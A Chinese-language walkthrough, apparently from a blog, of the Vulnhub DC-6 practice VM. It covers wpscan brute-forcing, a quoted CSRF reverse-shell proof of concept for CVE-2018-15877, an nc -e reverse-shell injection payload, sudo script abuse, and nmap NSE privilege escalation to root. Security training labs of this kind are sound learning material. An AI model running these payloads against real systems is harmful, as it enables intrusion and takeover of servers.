Vulnhub靶场DC-6练习

目录

  • 0x00 准备
  • 0x01 主机信息收集
  • 0x02 站点信息收集
    • 1. wordpress扫描
    • 2. wordlists字典爆破
  • 0x03 漏洞查找与利用
    • 1. 漏洞查找
    • 2. CVE-2018-15877漏洞利用
    • 3. 反弹shell
    • 5. nmap提权
  • 0x04 总结

0x00 准备


下载链接:https://download.vulnhub.com/dc/DC-6.zip

介绍:CLUE
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. 😉

在Description部分没有什么可以注意的信息,但是CLUE部分有需要注意的内容。给出了一条命令。/usr/share/wordlists/rockyou.txt是kali自带的字典。



0x01 主机信息收集


执行命令:ifconfig
kali本机的ip:192.168.22.48,网卡eth0


发现目标主机ip:netdiscover -i eth0 -r 192.168.22.0/24
目标主机ip:192.168.22.47

在这里插入图片描述


探测目标主机的开放端口:nmap -sS -sV -A -n 192.168.22.47
开放端口:22端口,ssh服务;80端口,Apache httpd 2.4.25

在这里插入图片描述


0x02 站点信息收集


1. wordpress扫描


从上面nmap扫描开放端口的结果来看,80端口,不允许重定向到http://wordy。访问一下这个站点:192.168.22.47,可以看到确实被重定向到了这个站点。

在这里插入图片描述


解决方法就是在/etc/hosts文件中加入:192.168.22.47 wordy

在这里插入图片描述


再次访问就可以正常打开了。

在这里插入图片描述


扫描一下站点的目录结构:dirsearch -u 192.168.22.47

在这里插入图片描述


访问:http://wordy/wp-login.php,发现是wordpress的后台登录界面。考虑找用户名和密码。
kali自带一个专门扫描wordpress的工具wpscan。
利用wpscan枚举站点的账户:wpscan --url http://wordy --enumerate u

在这里插入图片描述


2. wordlists字典爆破


从结果看出,有这五个用户。前面给出的关于这个靶场的线索,有个字典。所以考虑用那个字典对这几个账户进行爆破。
将这几个用户名保存在name6.txt文件中:

在这里插入图片描述



rockyou这个字典需要先解压。
进入目录/usr/share/wordlists,发现rockyou.txt.gz文件。
(第一次使用wordlists字典的话,需要手动安装一下,安装命令:wordlists
执行命令进行解压:gzip -c -d /usr/share/wordlists/rockyou.txt.gz > /usr/share/wordlists/rockyou.txt
解压成功后,再执行线索中给出的命令:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

在这里插入图片描述


再利用wpscan,对这几个账户进行暴力破解,执行命令:wpscan --url [http://](http://xxx/)wordy -P passwords.txt -U name6.txt

在这里插入图片描述


跑出来了一组用户名密码:Username: mark, Password: helpdesk01
从http://wordy/wp-login.php登录进去系统。



0x03 漏洞查找与利用


1. 漏洞查找


这个站点使用了 Activity monitor插件。
执行命令搜索有没有相关的漏洞:searchsploit Activity monitor

在这里插入图片描述


看一下这个文件的内容:cat /usr/share/exploitdb/exploits/php/webapps/45274.html

<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing listDescription:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/PoC:
--><html><!--  Wordpress Plainview Activity Monitor RCE[+] Version: 20161228 and possibly prior[+] Description: Combine OS Commanding and CSRF to get reverse shell[+] Author: LydA(c)ric LEFEBVRE[+] CVE-ID: CVE-2018-15877[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well--><body><script>history.pushState('', '', '/')</script><form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"><input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /><input type="hidden" name="lookup" value="Lookup" /><input type="submit" value="Submit request" /></form></body>
</html> 

根据提示信息,查找一些CVE-2018-15877相关的内容。可以实现反弹shell。



2. CVE-2018-15877漏洞利用


在这里输入127.0.0.1,点击lookup,抓包。

在这里插入图片描述


抓包,发送到repeater模块。

在这里插入图片描述


将这个提交的参数改为:127.0.0.1|whoami,可以看到返回了www-data。说明这里可以执行命令。

在这里插入图片描述


3. 反弹shell


现在kali上监听4545端口:nc -lvvp 4545

在这里插入图片描述



构造反弹shell的命令:127.0.0.1|nc -e /bin/bash 192.168.22.48 4545 (kali的ip),点击send。

在这里插入图片描述


在kali中看到监听端口4545成功。

在这里插入图片描述


输入命令进入交互模式:python -c 'import pty;pty.spawn("/bin/bash")’

在这里插入图片描述


进入mark的家目录,可以找到一个things-to-do.txt的文件,看一下文件内容。
看到了graham的账号密码。

在这里插入图片描述


想到开启了22端口。考虑ssh登录到graham账户。密码:GSo7isUM1D4
在kali中重新开一个终端,执行命令:ssh graham@192.168.22.47
成功登录了。

在这里插入图片描述


5. nmap提权


执行命令:sudo -l,查看可以使用的命令。

在这里插入图片描述


从结果可以得到,jens用户可以不用密码就执行/home/jens/backups.sh脚本。
看一下这个脚本的内容,执行命令:cat /home/jens/backups.sh

在这里插入图片描述


这个脚本的作用是解压文件。可以考虑向这个脚本中写入/bin/bash,然后利用jens用户来执行这个脚本。
向这个脚本中写入/bin/bash,执行命令:echo "/bin/bash" >> /home/jens/[backups.sh](http://backups.sh/)
写入成功。

在这里插入图片描述


进入这个脚本所在的目录:cd /home/jens
利用jens用户来执行这个脚本:sudo -u jens ./backups.sh

在这里插入图片描述



已经切换到jens用户了。
再执行 sudo -l 查看可以jens用户可以使用的命令。

在这里插入图片描述


jens用户可以不用密码运行root权限的nmap命令。考虑进行nmap提权。
nmap提权分为两种:旧版本和新版本。
旧版本的利用方式是进入交互模式提权:

# 进入nmap的交互模式
nmap --interactive
# 执行sh,提权成功
!sh

新版本的利用方式:

echo 'os.execute("/bin/sh")' > shellnmap.nse #写一个root shell的文件,调用系统命令执行/bin/bash
sudo nmap --script=shellnmap.nse #运行,nse是nmap的插件的扩展名


这里用新版方式,运行上述两条命令。进入/root目录,可以查看到有theflag.txt文件,查看文件内容即可。

在这里插入图片描述


0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放端口和服务。

站点信息收集:

  1. dirsearch查看网站目录结构。
  2. wpscan扫描wordpress的用户。
  3. wpscan利用wordlists字典爆破密码。

漏洞利用:

  1. Activity monitor插件的漏洞:CVE-2018-15877。
  2. 反弹shell。
  3. nmap提权。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1475529.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

代码随想录打卡第十三天

代码随想录–二叉树部分 day13 二叉树第一天 文章目录 代码随想录--二叉树部分二叉树基础知识一、力扣144--二叉树的前序遍历&#xff08;递归&#xff09;二、力扣145--二叉树的后序遍历&#xff08;递归&#xff09;三、力扣94--二叉树的中序遍历&#xff08;递归&#xff0…

【密码学】哈希函数与加密算法的关系

一、哈希函数的定义 哈希函数&#xff08;Hash Function&#xff09;&#xff0c;也被称为散列函数或杂凑函数&#xff0c; 是一种将任意长度的输入数据&#xff08;通常称为“预映射”或“消息”&#xff09;转换为固定长度输出&#xff08;通常称为“哈希值”、“散列值”、“…

Kotlin linkedMapOf filterKeys

Kotlin linkedMapOf filterKeys fun main(args: Array<String>) {val lhm linkedMapOf<String, Any>(Pair("name", "phil"), //因为key相同都为 name&#xff0c;被后面的覆盖。Pair("year", 2024),Pair("name", "f…

Gradle基础:从入门到掌握

人不走空 &#x1f308;个人主页&#xff1a;人不走空 &#x1f496;系列专栏&#xff1a;算法专题 ⏰诗词歌赋&#xff1a;斯是陋室&#xff0c;惟吾德馨 在现代软件开发中&#xff0c;自动化构建工具是提高效率和管理依赖的重要手段。而Gradle作为一种灵活且强大的构…

SRS流媒体服务器概述

SRS/5.0(Bee) is a simple, high efficiency and realtime video server, supports RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH and GB28181. 翻译&#xff1a;SRS/5.0(Bee)是一款简洁、高效、实时的视频服务器&#xff0c;支持RTMP、WebRTC、HLS、HTTP-FLV、SRT、MPEG-DAS…

欧美海外媒体发稿,国外新闻发布,外媒发布

欧美媒体的影响力 欧美媒体在全球范围内具有较大的影响力&#xff0c;其发稿内容更具全球化视野和多样化观点。欧美媒体多以英语为主要报道语言&#xff0c;覆盖的领域包括政治、经济、文化、科技等多个方面。例如&#xff0c;BBC、CNN、纽约时报等媒体机构的新闻报道被广泛引…

zdppy+onlyoffice+vue3解决文档加载和文档强制保存时弹出警告的问题

解决过程 第一次排查 最开始排查的是官方文档说的 https://api.onlyoffice.com/editors/troubleshooting#key 解决方案。参考的是官方的 https://github.com/ONLYOFFICE/document-server-integration/releases/latest/download/Python.Example.zip 基于Django的Python代码。 …

Linux 复现Docker NAT网络

Linux 复现Docker NAT网络 docker 网络的构成分为宿主机docker0网桥和为容器创建的veth 对构成。这个默认网络命名空间就是我们登陆后日常使用的命名空间 使用ifconfig命令查看到的就是默认网络命名空间&#xff0c;docker0就是网桥&#xff0c;容器会把docker0当成路由&…

容联云发布容犀大模型应用,重塑企业“营销服”|WAIC 2024

7月6日&#xff0c;在2024世界人工智能大会上&#xff0c;容联云成功举办主题为“数智聚合 产业向上”的生成式应用与大模型商业化实践论坛。 论坛上&#xff0c;容联云发布了容犀智能大模型应用升级&#xff0c;该系列应用包括容犀Agent Copilot、容犀Knowledge Copilot、容犀…

User parameters 用户参数与Web监控

目录 一. 自定义键介绍 二. 制作步骤 1. 添加无可变部分参数 2. 添加有可变参数 3. 使用用户参数监控php-fpm 服务的状态 三. Web页面导入应用监控 四. Web监控 主要功能和操作&#xff1a; 开启方式 官方预定义监控项文档https://www.zabbix.com/documentation/6…

代码随想录(day1)二分法

if语句的基本语法 if 要判断的条件: 条件成立的时候&#xff0c;要做的事举例&#xff1a; if nums[middle]<target:leftmiddle1 while语句的基本语法&#xff1a; while 判断条件(condition)&#xff1a;执行语句(statements)举例&#xff1a; while left<right:midd…

【小鸡案例】表单focus和blur事件用法

input中有2个属性&#xff0c;一个是focus获取焦点&#xff0c;一个是blur失去焦点。获取焦点就是我们点击输入框时输入框被选中&#xff1b;失去焦点即点击输入框以外的区域&#xff0c;今天就用这两种属性做一个点击输入框的动画效果。 先写个输入框&#xff0c;代码如下&am…

基于LabVIEW的设备安装螺栓连接设计

介绍了一种基于LabVIEW的辅助设备安装螺栓连接设计案例。通过LabVIEW软件&#xff0c;实现了从螺栓规格预估、强度校核到物料选用的整个流程的软件化&#xff0c;提高了设计效率和安装可靠性。 项目背景 在轨道车辆设备安装中&#xff0c;螺栓连接作为一种常见的紧固方式&…

【java计算机毕设】线上花店销售商城系统java MySQL ssm JSP maven项目代码源码+文档ppt

目录 1项目功能 2项目介绍 3项目地址 1项目功能 【java计算机毕设】线上花店销售商城系统MySQL ssm JSP maven项目代码源码文档PPT 小组设计代码 2项目介绍 系统功能&#xff1a; 线上花卉小铺系统包括管理员、用户俩种角色。 用户端&#xff1a;1.注册登录&#xff1a;游客…

系统化学习 H264视频编码(02) I帧 P帧 B帧 引入及相关概念解读

说明&#xff1a;我们参考黄金圈学习法&#xff08;什么是黄金圈法则?->模型 黄金圈法则&#xff0c;本文使用&#xff1a;why-what&#xff09;来学习音H264视频编码。本系列文章侧重于理解视频编码的知识体系和实践方法&#xff0c;理论方面会更多地讲清楚 音视频中概念的…

JavaWeb开发基础7个Web术语解析

7个Web术语 Website: static vs dynamic HTTP HTTP Requests GET vs POST Servlet Container Server: Web vs Application Content Type Website: static vs dynamic 网站内容包括文本、图片、音频、视频&#xff0c;通过URL来访问。网站分为静态网站和动态网站。 静态网…

HBuilder X 小白日记03-用css制作简单的交互动画

:hover选择器&#xff0c;用于选择鼠标指针浮动在上面的元素。 :hover选择器可用于所有元素&#xff0c;不只是链接 :link选择器 设置指向未被访问页面的链接的样式 :visited选择器 用于设置指向已被访问的页面的链接 :active选择器 用于活动链接

mp4视频太大怎么压缩不影响画质,mp4文件太大怎么变小且清晰度高

在数字化时代&#xff0c;我们常常面临视频文件过大的问题。尤其是mp4格式的视频&#xff0c;文件大小往往令人望而却步。那么&#xff0c;如何在不影响画质的前提下&#xff0c;有效地压缩mp4视频呢&#xff1f;本文将为您揭秘几种简单实用的压缩技巧。 在分享和存储视频时&am…

白嫖A100活动来啦,书生·浦语大模型全链路开源体系

扫码参加即可获得&#xff1a; 第一节 书生浦语大模型全链路开源体系 书生浦语大模型的开源历程。 从模型到应用的典型流程 书生浦语的开源体系&#xff0c;包含从数据、预训练、微调、部署、评测、应用等环节

C# Winform自制多轴力臂(简单易懂,方便扩展)

WinForms框架广泛应用于上位机开发领域&#xff0c;其中对力臂的精准控制是常见需求之一。本文深入探讨了如何创建自定义的多轴力臂图形控件&#xff0c;不仅涵盖了力臂图形控件的角度调节机制&#xff0c;还详细展示了如何实现力臂运动的生动动态效果&#xff0c;为开发者提供…